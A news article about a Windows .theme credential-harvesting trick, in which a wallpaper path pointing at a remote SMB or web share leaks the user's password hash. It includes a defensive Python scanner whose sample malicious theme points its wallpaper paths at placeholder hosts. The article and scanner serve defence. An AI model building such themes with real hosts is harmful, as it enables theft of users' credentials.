Changing your Windows theme seems innocent enough, and it
As Bleeping Computer notes, security researcher Jimmy Bayne (@bohops) has shown that the process isn’t even difficult: it takes advantage of several Windows behaviors to perform a “pass-the-hash” attack.
In a pass-the-hash attack, attackers don’t need your clear-text password. They set things up so that your hashed password is sent to them, and then they can present that hash to Microsoft (or whichever service the password belongs to) for authentication. Because the hash matches, it works just as well as the plain-text password.
[Credential Harvesting Trick] Using a Windows .theme file, the wallpaper key can be configured to point to an http/s resource that requires remote authentication. When a user activates the theme file (e.g. opened via a link/attachment), the user will see a Windows logon prompt. 1/4 pic.twitter.com/rgR3a9KP6Q
– bohops (@bohops) September 5, 2020
As Bayne explains, attackers can modify a Windows theme so that the operating system connects to a remote SMB share that requires authentication. When Windows connects to a remote SMB share like this, your account credentials are sent automatically to log in.
Microsoft moved to online accounts with Windows 10 and is slowly pushing everyone to use them. If you’re already signed in with your Microsoft account, that means your Microsoft username and hashed password are passed to the attacker.
Once an attacker has modified a theme, they can save it and upload it to websites that host Windows themes. You won’t know what hit you until it’s too late. Bayne reported the problem to Microsoft, but the company declined to issue an update because it considers the behavior a “feature by design.”
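The check a defender would want before applying a downloaded theme is simply to look at where the theme's image paths point. The following Python script is an added illustration, not code from Bayne, Bleeping Computer or Microsoft: it parses a .theme file as the INI-style text it is and flags wallpaper or slideshow paths that refer to a network location (UNC path or http/s URL), which is what makes Windows reach out and authenticate. It assumes the commonly seen `[Control Panel\Desktop]` `Wallpaper=` and `[Slideshow]` `ImagesRootPath=` keys; the two sample themes in the block are constructed for the demonstration.

```python
"""Flag .theme files whose wallpaper/slideshow paths point off the local machine.

Added example (not the researcher's or Microsoft's code). Assumes the INI-style
.theme layout: a [Control Panel\\Desktop] section with Wallpaper= and an
optional [Slideshow] section with ImagesRootPath=. Sample themes are constructed.
"""
import re
from typing import List, Tuple

# Keys whose values Windows resolves as a file path when the theme is applied.
# (This key list is an assumption based on typical Windows 10 .theme contents.)
PATH_KEYS = {
    ("control panel\\desktop", "wallpaper"),
    ("slideshow", "imagesrootpath"),
}

# A UNC path, protocol-relative path or http/s/file URL means Windows will
# fetch the image over the network and may send credentials to do so.
REMOTE_PATTERN = re.compile(r"^\s*(\\\\|//|https?://|file://)", re.IGNORECASE)


def parse_theme(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples from INI-style theme text."""
    section = ""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip().lower(), value.strip()))
    return entries


def find_remote_paths(text: str) -> List[Tuple[str, str, str]]:
    """Return the path-bearing entries whose value points at a remote location."""
    return [
        (section, key, value)
        for section, key, value in parse_theme(text)
        if (section, key) in PATH_KEYS and REMOTE_PATTERN.match(value)
    ]


# Constructed sample: a normal local theme ...
BENIGN_THEME = """[Theme]
DisplayName=Plain
[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
"""

# ... and one whose image paths reach out to the network (203.0.113.10 and
# example.invalid are documentation/placeholder hosts, not real ones).
SUSPICIOUS_THEME = """[Theme]
DisplayName=Free Wallpaper Pack
[Control Panel\\Desktop]
Wallpaper=\\\\203.0.113.10\\share\\wall.jpg
[Slideshow]
ImagesRootPath=https://example.invalid/pics
"""

if __name__ == "__main__":
    for name, theme in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        hits = find_remote_paths(theme)
        verdict = "REMOTE PATH, do not apply" if hits else "local paths only"
        print(f"{name}: {verdict} {hits}")
```

To vet a real file, read it with `open(path, encoding="utf-16")` or `"utf-8"` (themes shipped by Windows are often UTF-16) and pass the text to `find_remote_paths`; any non-empty result is reason not to double-click the theme, regardless of where it was downloaded from.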
Bayne suggested a few workarounds, but they break the Windows theme feature.
Once you’ve applied one of them, you won’t be able to change themes (until you undo the change). The safest step is to enable two-step authentication: if someone steals your password, they still don’t have everything they need to get into your account.
Source: Jimmy Bayne via Bleeping Computer